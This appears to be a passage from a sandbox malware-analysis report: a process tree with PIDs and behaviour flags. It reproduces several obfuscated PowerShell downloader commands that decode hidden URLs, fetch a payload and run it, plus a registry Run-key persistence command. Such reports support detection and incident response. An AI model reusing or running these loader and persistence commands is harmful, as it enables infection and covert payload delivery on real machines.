.erolSammed L.reem.nudtTanglsOpkal,Untru$PamflPIdioto De xuUnharlSweeptHobbyiSteppcEf.ereS.ien)Siree ');Flaprer $socialisvmr;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"
3⤵
PID:4148

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf DieseKod.obLder.l ListoUnderoGare.dVou h]Pupil=Indyn$ CedeGRareteAnticn robeKod fr MaunaNonful Wonki.getisMediotPrincepsychrFors.nWebbeeoctansBgetr ');$Sedimentology=Quadmeter 'Forsg$CholoHFollouMo.incMichakCrudss bucctJevgeePs,udrUnde eSveskrP.ese.OyezeDProtaoCo bowDisfanHjernlFremfoBeskmaorgand BuslFsprayihelbrlVentreSkamf(Natur$enk sPOssifoSydkos Nonst FrihfJusterTakvioE,iksn RichtFolkeafilmil Un m,ele.t$SchweSMismoeKemikn.ftrasDiagniSub to TailnZa cl)Repro ';$Sension=$Mariane[0];Flaprer (Quadmeter 'F sty$cantlg ulteliv rao NonpbPr.reavandslE imi: .easI O,ygbBronzoSkee.eBleganMorfid BaadeHaptosHtte.=Hippo(taljeT arteFaldlsG bbetGl.sp-GgetsPVildta Gri,tStoddhoutpu udfol$ KodeS H,nseIngvenRundtsho.nwiAllowoB ogrnG,atb)Outsi ');while (!$Iboendes) {Flaprer (Quadmeter 'Diale$ ,notgSimull Bjero lagebS,iklaMacrolMiste:Fryt rtorpeeTalefw L llaEmbrokMycetiF.rlanKh ttgOuttr= Efte$,elgetarti,rSandiuCirc eFlabe ') ;Flaprer $Sedimentology;Flaprer (Quadmeter 'I.bjeSluthetBejaeaGleb,rHou et Gest- Nav SVinealAni.oeBriefeTroldpF.jia Rollo4Viru, ');Flaprer (Quadmeter 'Tryll$ infigTrafilTftinoAmpulb LudlaCheatlConso:BrndeI In ubThatconatioeConfin GalidFinene TerrsSkabs=Indle(SumplTPolite BeausClitutAnato- eakPHalluaFlammtS,linhUneli Pipet$ ConiSI dolePuppenSa,icscynomiFatt oPensinTande)Charl ') ;Flaprer (Quadmeter ' Nond$StilegSuccelUp taoKraftbImmeaaKontrlAf ci:Su,taNNul.teUnderw,krivsModstp MetaaKont,pTn,haeBegrbrAmalgw Sty,o uncomTrisoaTractnFiske=Sabao$ SivegProtalFrancoEsp,rbSuppeaKaliblYderv:Dok,eBopskrip,wdol PolslSonateFodredHdersgLseh.aKar,olSh,inlFileteBef lrKiliaiEn.ase He.srSu,penSt afe.esvr+ nfo+U,kke%Bordi$ MistS AfhatBogs,oHe taoBrnefn sams.Snipeclo,aloU deruartisnMonert Ste, ') ;$Postfrontal=$Stoon[$Newspaperwoman];}$Bortfaldets=331483;$Poultice=30104;Flaprer (Quadmeter 'Skra,$Jo,dfgSko,al,ovino P,ptbskaana heatlAll.n:UdbetTublufr.fspioBajadvfips,a UnretMinisoFiltrr SarieAntip Shri = skbn BietGTr gaeCo,sutVitam-TelocC S psoNephrn Dil.t FakueRaadynK oketBric Disso$ arinSAmazee ircn ,ndesKu,suiLatk,o f,ldnSnder ');Flaprer (Quadmeter 'De,ar$MetapgAlloclBethooInadvbHillbaTwic,lFilip:PrismHMedgaablegvzBitmaaI.idar.nebodGuttoiSvanesPeutieParoqspot.t Afnat=Pl ty Feti[,amilSNanosyAriids NonetSma.semucovmDisda. BeviCRetteo skr ncentrv unadeRenslrImplat Radi]Aarli:fdeva: AchrF.eogrrAt mioUdspemBygniBFusenaSigtesDybh.eStave6A,nes4AuspiS TjentOmvejrTernii Lin.nSkrubgeuryc(Kneb $KnaplTKra arS,xmio BestvParacaNumistIngefo nonirCent,eSisle) Homo ');Flaprer (Quadmeter 'Hoved$plukngE.ikelbrawnoAtlanb Ud.ia Trk.lLilia: ,oelSBi,alasim ldF,bridko.mue SkomlNetvrmstodgaBu lsgSchzjeFolkerG dssa KinnrGripybGag reSadisj DolldBesteeRkenlsStaff Foder=Airti super[StoltSSt.dgy CapesPostutHovedeAvogamDemag.Klun,TMononePaymax apentmaras. HedeEBrndsnNeurocVo,alo onomdEvighiFod onResolgWhitl]No.pr:batik:JechoAdetalSVirkeC Sub,IFrienISnadr. VigtG MesoeFili.tOtopaSFedtit.obberSalzfiRewaknG,nopgAlarm(L,ane$PopulHDrmmeaCentrzAfd laPhenor JuandEl rii Flaksbyta eMakkes .sdi)Numme ');Flaprer (Quadmeter 'hem.a$ModergApplalMozaroMisfibEg.nvaFertilOver :Vagtls undeoTet.acDi,ori Hyp aIn,uslb,irui UncosSymmevUr nem Hjlpr.naud= Unva$UnturSSpr.naBeskudYestod FebreFotoelOutram SelvaUnpasgHoldfeKantar BornaAdiporFusepbAnidreGanerjSkilldEjerteEntossUncov.WarslsTilveuKastabBurresStewatU,gagrOrcaniLicounEpexegHybe (Circu$SonniB SammoNonenr BohetProb.f Tilda .erolSammed L.reem.nudtTanglsOpkal,Untru$PamflPIdioto De xuUnharlSweeptHobbyiSteppcEf.ereS.ien)Siree ');Flaprer $socialisvmr;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"
4⤵
PID:4080

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
5⤵
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:3312

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\mlakoo.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firhjulede47='Sub';$Firhjulede47+='strin';$Lnarbejderne = 1;$Firhjulede47+='g';Function Cremerne($Barnefaderens){$Regretfully177=$Barnefaderens.Length-$Lnarbejderne;For($Oreodontine=5;$Oreodontine -lt $Regretfully177;$Oreodontine+=6){$Nazeranna+=$Barnefaderens.$Firhjulede47.Invoke( $Oreodontine, $Lnarbejderne);}$Nazeranna;}function belejlige($Foreleg){. ($omdiskuteret) ($Foreleg);}$Krmmerhuse=Cremerne ' MiniMAgoraoTuri zPressiFore lSerinlbino.ae ang/Macro5Worde.Mulig0Decri Nynaz(GuttuWSamlei S.iknpse dd Li,eoSubjewHrerssSente Str.NSalgsTAd.pr M,ni1Subfi0 Bibe.Bourr0Mo,ig;Lderb .redeW PostiAarrinKaram6multi4 hand; At,a draxsving6 S,il4Shahp;Duppe LazarrShellvS leh:Blesa1Friha2Co,nb1Socia.Syste0Risen)Tearj EntopGGlas.eHo decReex.k CalaoHelta/Tille2Sl un0Emehv1I ddr0Unwin0Menom1Illim0 Anti1Desub FormaFAnhydiEks rrSk,ideRv.skfAppreoUdpinx.eter/flids1Tandb2Lejer1Slave.Blama0Cykli ';$Insectival=Cremerne ' BeatU DennsN tideTeksbrmicro- etlaAWhinig b.gneGrinenBibelt Gast ';$fairylike=Cremerne 'BrusehOn netScur,tGan ep Amats Leth:Ortyg/ Lo a/SuperjUnmanoInfikcRensecF,ertuHex npVirknaMatert,ycamiForhaoDahoonTankeaOpkallo.tvis eronc erfoiBeckseilen,n YnglcInrigePreli.Svineotho wrKontogPassa/ iolezPaddlaFinanrH.lpeaEmbai/PragtGFarvelPunchoTilremFordmeBoligr overuPatril Stomi.ortatprideiStrygsChymi.HemmedKra leMinimpTur,ylIslamoArchayDicki ';$Thage=Cremerne 'Unfri>.liss ';$omdiskuteret=Cremerne ' dpegi CutaeBetj,x ddit ';$Tattie='Udbredelsesomraader';$Flovserne = Cremerne 'UnmeleCompacDitikhUds.roGenin Toeli%DunhiaConcepTillipchalcdFoderabil.etUranoaBrand%Invo,\Rhi oSUmulioFolkerOversbSkdese Men.tBabel.D.limUBlocknParadbBruge Half&Pingu&Uindb .hirteCon icFednihGandeoCant OghatOprin ';belejlige (Cremerne ' Krav$ Hopeg akalIncl.opes,ibKlkniaNonsilSiren:DrakbpUsikkrHyperoToelivDmoneoS,rukkGamina HypetSt derSha e=Areng(sherecRiotem BelvdPr va Disk/StenfcKo,ge ,ocki$ElektFChr,mlNsehooDebowvFaradsAssi,eC orerSka,tnI,ddreOvers) Prof ');belejlige (Cremerne ' Ste,$Slv,ng .epalKl edoArranbImagoaRefutlEpigr:Ska lS Ch,rttmm.racyanoi .fferHematcaubepaSqua sBaskeeUdsyrsgu.ra=Produ$DibblfBesn.aReil.iNoninrPauliyB,somlBrig i.uropkTappee,enzi. tags Ta.rp,nhaulSwathiVernot orig(Cruel$ SpalTTabelhSipsba.vedjgKniveeRitua)Missi ');$fairylike=$Staircases[0];$bestyrelsesreferaterne= (Cremerne 'Dekl,$hjlp.gUnpeclUdkmpoDe erb uperaFo.vilSyn.s:Fa.ceUTopfonFlan c,tartuCava r .olibMe.th=CyrilNFlj,reOospowJirin-DisanOMitogbU.derjGtraneKilotcdam.rtDi.ta ResiS S.ovyPostisUnsugtPreabeFjerdm.karl. orbeN In lePr.rotBorgm.Cod,rW ImpeeH llibSelskCUn.erlI,variKrakeeBlindnA erat');$bestyrelsesreferaterne+=$provokatr[1];belejlige ($bestyrelsesreferaterne);belejlige (Cremerne 'resun$preamUElectn ParecScrapuTillgr evisbPerso..nderHSammee Hud,a No.cd .ilje TiccrBl,nisMorsi[afspn$NonfuIbaladnExtrasImpoveTranscEftert.largiRecanvUndera BrullWri.t]styrt=Bagst$De.isKOparerSpiramGolasmAllokeHektorPrebih VoicuAnnu.sUdrugePers ');$Nykkes=Cremerne 'Sandg$KbtesUPreponJaloucBew au BogbrRecitbpharm.Loai DNdl.noMediawBekennSem el.ngoroMolybaBrigadUd,ryF.luigi NarklAmpaneOverf( unmi$R klafHelioaRein,iFosforFarray seholm.spui T.lsk,oursexerog,L,opo$ krifgHauntl parao embebSubdoaProsplO lysiVampesUds.raEpilat FootiDatoloParaln Emp,sEkvip) Sla, ';$globalisations=$provokatr[0];belejlige (Cremerne '.aris$Sceneg S btlLrerkoF.yvebNormaaMo,gelBind,:GravsbPensieNorm,lGibboiChlorz Retoe SorgrUdhvne ldri=Varme(AlurrTIndfaeGallis CoactBl as-Su,alPHamesaUndert AffrhFe,lb Tidsg$ MosagRevinlIntraoEfterbIoni.aCallelForbriM rtgsS.abha Derit aabsiCon ioFaithnJadeisGaffe)S.rot ');while (!$belizere) {belejlige (Cremerne ' .and$TubipgMeaselPopulo Sy,tbAto,laDig,al Va.n: biscCG leroC anhnLang fEdgebi Kj sdErythe BhunrBrn k=Frbid$Coupat Chror Re,ouNivaleHet,r ') ;belejlige $Nykkes;belejlige (Cremerne 'InterSHomontplaceaVi.rarGara,t ,ett-AandeS TyktlSkaereF.rileDefinpRaffi H,gbu4Shall ');belejlige (Cremerne ',irak$RecabgPreeplB,ainoEmig b.nteraDre,alUnscu:Inds,bWareseR ceplAlb,niBlattzAlumieSc,olr gen.eBucol= St,r(K,loaTFljteeB,yggsAvoditPillo-MultiPFrydea AmagtCyanshbruge Torta$NondegTa ajlSt.neoUns,sbBr,ncamangal dleji Pa esShaf,aAletatTvegei Ad ioHer.tn TilmsRes,s)Kaste ') ;belejlige (Cremerne 'Toyli$ TwadgUngo.lbeg eoPhlo,b DiffaSik elEne.g:Race oAgterpterris ForslFolkeaLocutaTime =Pala.$FotoggAnanalkedeloScenebMoab aArvellInver:P.ecoJMeno uSin,sbbl.tti Protlmis,auPurlimM ljtsGurramBl,dtiMogv,dDrumbdTyndeas,enegReligeRegrenDrepasUopmr+Butik+Ackno% kern$Mch,gSChryst,idegaEmanuiMankirBerascopstrask.drs UdtreGavnls Syst.Nicolc.armkoKura,uAl trnrekurt Suff ') ;$fairylike=$Staircases[$opslaa];}$skriftsnit=294679;$Pomeransskal=27677;belejlige (Cremerne 'Rinki$Funktg BuntlHoldioPudibbNum,ea Di plLevem:SilicVAppanaArbe,g Partt arsm hirdeStaklsSkomatUnadje sller Atri ema=Overg eimbGudtyderichmt harr-BromoC Ka aoImprinWandltU.ganeLuf knVi totTidsp For.n$Unde.g Bed,lConfioRe,edbSubliaTagenlMa keiRgte ssel.maOphictPreceiInigooH.lshnEnkels Tres ');belejlige (Cremerne 'Uigen$UlkengSt erlE.hveoVeks.bNemala Supel tolt: MennRT iche C.unfDiagoe Spart Astre orr Aechm=Flags Megap[Kupo.S arjoyMondes PristTermieDeplam .lad.WiltoCKultuoReb unImprev.ykkeeTfteerDysfutCoshe]Comps:Sansc:unbu FTimefrMundioI framDomi BUngyra Indfs Fluoe Dism6Peach4umrkeSLikv tLandgrLo,taiorgannFlad gTamme(.arad$RundkVEneinaW,orrg TotatBlaasm oykoeSwazis,hrontRegraege dir kste)Anal. ');belejlige (Cremerne 'Lnest$TrumpgCaraml.roncoPervebDagg,aOrdkllAfrej:BrnefUPesosnEr kkeGrovexhypobpSupereIngegd Fli,iBeaujeTovrenTimort ArkflValgpyHofde3produ Chole= Pla, .inis[ReestSMona,yOverss ioskt SysseSkjtemUland.GoliaTGritteLept.xPap,rtTe,tl. TilbEConvenBatinccalopoPygmydWart,i RestnCrategVampe]Vagst: Epis:TyranAUrethSTotalC BrobI iogrI Nonp. TegnGUd,tae dekatAdenaS UnbutSigjnrHypofiSubsenPraksgGrusg(Fo.ko$lingbRBimeteHyperf FrndeAkadetSkamseErkla)Malis ');belejlige (Cremerne ' Moto$ShawlgCon alP ndioOpiumbKorthaPy.nilSitti:Mome UGdninntriakc,nnemeFlovmrSrilatT,gheiTudehfKandiiL mpwaalkydbStandlLotuseHulkolBlselyUndew=In us$ungagUSpinknThaiseCineaxhyre.pUdpoleO.ervdinteli Arrhe Dek.nLatentD.apelAstroy Ran 3stuep.SymptsPiezouFeateb TangsMickyt Satar LongiEnf.en D.neginvol(Phila$StedssDelmnkDeli,r ClamiAc nefbundstKultusFormun LazaiTes.etPensi,Bling$slgtsP FingoBrudemskelseFr.garPr,poaComp,nK leys StersPicomkL assa OptalVi.ef)Micro ');belejlige $Uncertifiablely;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sorbet.Unb && echo t"
7⤵
PID:2932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firhjulede47='Sub';$Firhjulede47+='strin';$Lnarbejderne = 1;$Firhjulede47+='g';Function Cremerne($Barnefaderens){$Regretfully177=$Barnefaderens.Length-$Lnarbejderne;For($Oreodontine=5;$Oreodontine -lt $Regretfully177;$Oreodontine+=6){$Nazeranna+=$Barnefaderens.$Firhjulede47.Invoke( $Oreodontine, $Lnarbejderne);}$Nazeranna;}function belejlige($Foreleg){. ($omdiskuteret) ($Foreleg);}$Krmmerhuse=Cremerne ' MiniMAgoraoTuri zPressiFore lSerinlbino.ae ang/Macro5Worde.Mulig0Decri Nynaz(GuttuWSamlei S.iknpse dd Li,eoSubjewHrerssSente Str.NSalgsTAd.pr M,ni1Subfi0 Bibe.Bourr0Mo,ig;Lderb .redeW PostiAarrinKaram6multi4 hand; At,a draxsving6 S,il4Shahp;Duppe LazarrShellvS leh:Blesa1Friha2Co,nb1Socia.Syste0Risen)Tearj EntopGGlas.eHo decReex.k CalaoHelta/Tille2Sl un0Emehv1I ddr0Unwin0Menom1Illim0 Anti1Desub FormaFAnhydiEks rrSk,ideRv.skfAppreoUdpinx.eter/flids1Tandb2Lejer1Slave.Blama0Cykli ';$Insectival=Cremerne ' BeatU DennsN tideTeksbrmicro- etlaAWhinig b.gneGrinenBibelt Gast ';$fairylike=Cremerne 'BrusehOn netScur,tGan ep Amats Leth:Ortyg/ Lo a/SuperjUnmanoInfikcRensecF,ertuHex npVirknaMatert,ycamiForhaoDahoonTankeaOpkallo.tvis eronc erfoiBeckseilen,n YnglcInrigePreli.Svineotho wrKontogPassa/ iolezPaddlaFinanrH.lpeaEmbai/PragtGFarvelPunchoTilremFordmeBoligr overuPatril Stomi.ortatprideiStrygsChymi.HemmedKra leMinimpTur,ylIslamoArchayDicki ';$Thage=Cremerne 'Unfri>.liss ';$omdiskuteret=Cremerne ' dpegi CutaeBetj,x ddit ';$Tattie='Udbredelsesomraader';$Flovserne = Cremerne 'UnmeleCompacDitikhUds.roGenin Toeli%DunhiaConcepTillipchalcdFoderabil.etUranoaBrand%Invo,\Rhi oSUmulioFolkerOversbSkdese Men.tBabel.D.limUBlocknParadbBruge Half&Pingu&Uindb .hirteCon icFednihGandeoCant OghatOprin ';belejlige (Cremerne ' Krav$ Hopeg akalIncl.opes,ibKlkniaNonsilSiren:DrakbpUsikkrHyperoToelivDmoneoS,rukkGamina HypetSt derSha e=Areng(sherecRiotem BelvdPr va Disk/StenfcKo,ge ,ocki$ElektFChr,mlNsehooDebowvFaradsAssi,eC orerSka,tnI,ddreOvers) Prof ');belejlige (Cremerne ' Ste,$Slv,ng .epalKl edoArranbImagoaRefutlEpigr:Ska lS Ch,rttmm.racyanoi .fferHematcaubepaSqua sBaskeeUdsyrsgu.ra=Produ$DibblfBesn.aReil.iNoninrPauliyB,somlBrig i.uropkTappee,enzi. tags Ta.rp,nhaulSwathiVernot orig(Cruel$ SpalTTabelhSipsba.vedjgKniveeRitua)Missi ');$fairylike=$Staircases[0];$bestyrelsesreferaterne= (Cremerne 'Dekl,$hjlp.gUnpeclUdkmpoDe erb uperaFo.vilSyn.s:Fa.ceUTopfonFlan c,tartuCava r .olibMe.th=CyrilNFlj,reOospowJirin-DisanOMitogbU.derjGtraneKilotcdam.rtDi.ta ResiS S.ovyPostisUnsugtPreabeFjerdm.karl. orbeN In lePr.rotBorgm.Cod,rW ImpeeH llibSelskCUn.erlI,variKrakeeBlindnA erat');$bestyrelsesreferaterne+=$provokatr[1];belejlige ($bestyrelsesreferaterne);belejlige (Cremerne 'resun$preamUElectn ParecScrapuTillgr evisbPerso..nderHSammee Hud,a No.cd .ilje TiccrBl,nisMorsi[afspn$NonfuIbaladnExtrasImpoveTranscEftert.largiRecanvUndera BrullWri.t]styrt=Bagst$De.isKOparerSpiramGolasmAllokeHektorPrebih VoicuAnnu.sUdrugePers ');$Nykkes=Cremerne 'Sandg$KbtesUPreponJaloucBew au BogbrRecitbpharm.Loai DNdl.noMediawBekennSem el.ngoroMolybaBrigadUd,ryF.luigi NarklAmpaneOverf( unmi$R klafHelioaRein,iFosforFarray seholm.spui T.lsk,oursexerog,L,opo$ krifgHauntl parao embebSubdoaProsplO lysiVampesUds.raEpilat FootiDatoloParaln Emp,sEkvip) Sla, ';$globalisations=$provokatr[0];belejlige (Cremerne '.aris$Sceneg S btlLrerkoF.yvebNormaaMo,gelBind,:GravsbPensieNorm,lGibboiChlorz Retoe SorgrUdhvne ldri=Varme(AlurrTIndfaeGallis CoactBl as-Su,alPHamesaUndert AffrhFe,lb Tidsg$ MosagRevinlIntraoEfterbIoni.aCallelForbriM rtgsS.abha Derit aabsiCon ioFaithnJadeisGaffe)S.rot ');while (!$belizere) {belejlige (Cremerne ' .and$TubipgMeaselPopulo Sy,tbAto,laDig,al Va.n: biscCG leroC anhnLang fEdgebi Kj sdErythe BhunrBrn k=Frbid$Coupat Chror Re,ouNivaleHet,r ') ;belejlige $Nykkes;belejlige (Cremerne 'InterSHomontplaceaVi.rarGara,t ,ett-AandeS TyktlSkaereF.rileDefinpRaffi H,gbu4Shall ');belejlige (Cremerne ',irak$RecabgPreeplB,ainoEmig b.nteraDre,alUnscu:Inds,bWareseR ceplAlb,niBlattzAlumieSc,olr gen.eBucol= St,r(K,loaTFljteeB,yggsAvoditPillo-MultiPFrydea AmagtCyanshbruge Torta$NondegTa ajlSt.neoUns,sbBr,ncamangal dleji Pa esShaf,aAletatTvegei Ad ioHer.tn TilmsRes,s)Kaste ') ;belejlige (Cremerne 'Toyli$ TwadgUngo.lbeg eoPhlo,b DiffaSik elEne.g:Race oAgterpterris ForslFolkeaLocutaTime =Pala.$FotoggAnanalkedeloScenebMoab aArvellInver:P.ecoJMeno uSin,sbbl.tti Protlmis,auPurlimM ljtsGurramBl,dtiMogv,dDrumbdTyndeas,enegReligeRegrenDrepasUopmr+Butik+Ackno% kern$Mch,gSChryst,idegaEmanuiMankirBerascopstrask.drs UdtreGavnls Syst.Nicolc.armkoKura,uAl trnrekurt Suff ') ;$fairylike=$Staircases[$opslaa];}$skriftsnit=294679;$Pomeransskal=27677;belejlige (Cremerne 'Rinki$Funktg BuntlHoldioPudibbNum,ea Di plLevem:SilicVAppanaArbe,g Partt arsm hirdeStaklsSkomatUnadje sller Atri ema=Overg eimbGudtyderichmt harr-BromoC Ka aoImprinWandltU.ganeLuf knVi totTidsp For.n$Unde.g Bed,lConfioRe,edbSubliaTagenlMa keiRgte ssel.maOphictPreceiInigooH.lshnEnkels Tres ');belejlige (Cremerne 'Uigen$UlkengSt erlE.hveoVeks.bNemala Supel tolt: MennRT iche C.unfDiagoe Spart Astre orr Aechm=Flags Megap[Kupo.S arjoyMondes PristTermieDeplam .lad.WiltoCKultuoReb unImprev.ykkeeTfteerDysfutCoshe]Comps:Sansc:unbu FTimefrMundioI framDomi BUngyra Indfs Fluoe Dism6Peach4umrkeSLikv tLandgrLo,taiorgannFlad gTamme(.arad$RundkVEneinaW,orrg TotatBlaasm oykoeSwazis,hrontRegraege dir kste)Anal. ');belejlige (Cremerne 'Lnest$TrumpgCaraml.roncoPervebDagg,aOrdkllAfrej:BrnefUPesosnEr kkeGrovexhypobpSupereIngegd Fli,iBeaujeTovrenTimort ArkflValgpyHofde3produ Chole= Pla, .inis[ReestSMona,yOverss ioskt SysseSkjtemUland.GoliaTGritteLept.xPap,rtTe,tl. TilbEConvenBatinccalopoPygmydWart,i RestnCrategVampe]Vagst: Epis:TyranAUrethSTotalC BrobI iogrI Nonp. TegnGUd,tae dekatAdenaS UnbutSigjnrHypofiSubsenPraksgGrusg(Fo.ko$lingbRBimeteHyperf FrndeAkadetSkamseErkla)Malis ');belejlige (Cremerne ' Moto$ShawlgCon alP ndioOpiumbKorthaPy.nilSitti:Mome UGdninntriakc,nnemeFlovmrSrilatT,gheiTudehfKandiiL mpwaalkydbStandlLotuseHulkolBlselyUndew=In us$ungagUSpinknThaiseCineaxhyre.pUdpoleO.ervdinteli Arrhe Dek.nLatentD.apelAstroy Ran 3stuep.SymptsPiezouFeateb TangsMickyt Satar LongiEnf.en D.neginvol(Phila$StedssDelmnkDeli,r ClamiAc nefbundstKultusFormun LazaiTes.etPensi,Bling$slgtsP FingoBrudemskelseFr.garPr,poaComp,nK leys StersPicomkL assa OptalVi.ef)Micro ');belejlige $Uncertifiablely;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sorbet.Unb && echo t"
8⤵
PID:3276

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1576

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hqwokv.vbe"
9⤵
- Checks computer location settings
PID:5924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
